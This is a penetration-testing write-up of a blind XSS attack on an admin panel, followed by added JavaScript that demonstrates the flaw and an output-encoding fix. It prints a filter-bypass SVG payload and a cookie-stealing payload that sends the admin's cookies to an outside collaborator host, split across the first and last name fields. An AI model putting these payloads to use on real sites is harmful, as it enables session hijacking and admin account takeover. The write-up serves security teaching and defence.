بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ
In the name of Allah, the Most Gracious, the Most Merciful.
Today I will discuss how I got an admin account takeover through a tricky blind XSS scenario during a penetration testing engagement, where I had to bypass multiple restrictions to reach the final payload.
Whenever I start on a new target, one thing I like to do is put a blind XSS payload in the username field, since it may be reflected somewhere in the admin panel.
But each time I tried injecting a basic payload I got blocked, so I tried some bypasses and ended up with this payload:
<svg Only=1 onload="alert(1)'">
And it worked! The XSS payload executed in the admin panel and the alert popped.
Now all I had to do was steal the admin's cookies. Simple, right?
Unfortunately, when I tried to inject a payload to steal the admin's cookies I hit another obstacle: the name field only accepts inputs of at most 50 characters, so submitting the full payload gave me an error.
So I had to find another way to retrieve the cookies with a shorter payload.
I tried many approaches, including shorter URIs such as webhook.site and the tiny XSS payload lists, but every payload still exceeded the 50-character limit.
Then I noticed something interesting about how entries are displayed in the admin panel: the first and last names are concatenated together before being displayed on the page.
In theory, that meant I could split the XSS payload between the first and last name fields and it would be concatenated back together in the admin panel!
So I split the payload so that each parameter contained exactly 50 characters:
<svg Only=1 onload="window.location='https://fkzqv7ui1098g57byzond.oastify.com?X='+document.cookie">
And BOOM, we get the admin's cookies in our Burp Collaborator and a full admin account takeover :D
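The security-relevant lesson is that the 50-character limit is an input-side control applied to each field separately, while the injection happens on the output side, where the two fields are joined and rendered into the admin's page. The following JavaScript is an added example written for this write-up, not code from the target application or the original post. It assumes the admin panel builds a table cell from the two stored fields joined by a single space (the separator is an assumption; the write-up only says they are concatenated), and it uses a constructed, harmless payload rather than the author's. It shows that each half passes the per-field length check, that the vulnerable renderer emits an injected element, and that HTML-encoding the joined string at the sink neutralizes it regardless of how the input was split.

```javascript
// Added example for this write-up (not code from the target application or
// the original post). The admin-panel template, the field separator and the
// sample values below are assumptions constructed for the demonstration.

const MAX_FIELD_LEN = 50; // per-field limit described in the write-up

// Input-side check as the vulnerable application applied it: each name
// field is length-limited on its own. This bounds each field, not the
// string that is rendered later.
function acceptField(value) {
  return typeof value === "string" && value.length <= MAX_FIELD_LEN;
}

// How the admin panel is assumed to join the two stored fields. The write-up
// only says they are concatenated; a single space separator is an assumption.
function joinName(first, last) {
  return first + " " + last;
}

// Vulnerable rendering: the joined name is interpolated into markup with no
// encoding, so any tag it contains becomes part of the admin's page.
function renderRowVulnerable(first, last) {
  return `<td class="user">${joinName(first, last)}</td>`;
}

// Contextual output encoding for an HTML text-content sink: every character
// that could start a tag, close an attribute, or begin an entity is replaced
// by its character reference.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Hardened rendering: encode at the sink, after the join, so it does not
// matter how the attacker distributed the string across input fields.
function renderRowSafe(first, last) {
  return `<td class="user">${escapeHtml(joinName(first, last))}</td>`;
}

// Test-suite style check on rendered output: does the cell contain any
// element other than the template's own <td>...</td> wrapper?
function containsInjectedElement(html) {
  const inner = html.replace(/^<td class="user">/, "").replace(/<\/td>$/, "");
  return /<[a-zA-Z]/.test(inner);
}

// Constructed sample: a harmless 66-character payload that exceeds the
// per-field limit as a whole but fits when split across first and last name.
const SAMPLE_FIRST = "<svg onload=\"console.log('first and"; // 35 chars
const SAMPLE_LAST = "last name were joined here')\">";        // 30 chars

// Runs the comparison and returns the results so they can be asserted on.
function demo() {
  const vulnerable = renderRowVulnerable(SAMPLE_FIRST, SAMPLE_LAST);
  const safe = renderRowSafe(SAMPLE_FIRST, SAMPLE_LAST);
  return {
    eachFieldAccepted: acceptField(SAMPLE_FIRST) && acceptField(SAMPLE_LAST),
    joinedWouldBeRejected: !acceptField(joinName(SAMPLE_FIRST, SAMPLE_LAST)),
    vulnerableInjected: containsInjectedElement(vulnerable),
    safeInjected: containsInjectedElement(safe),
    vulnerable,
    safe,
  };
}

console.log(demo());
```

Run it with node to see both renderings side by side. The fix belongs at the rendering point (or in the template engine's auto-escaping), not in a longer blocklist or a tighter length limit: any check applied per field can be defeated by splitting the input across fields that are joined later, so the rendered string is the only place where the whole value can be seen and encoded.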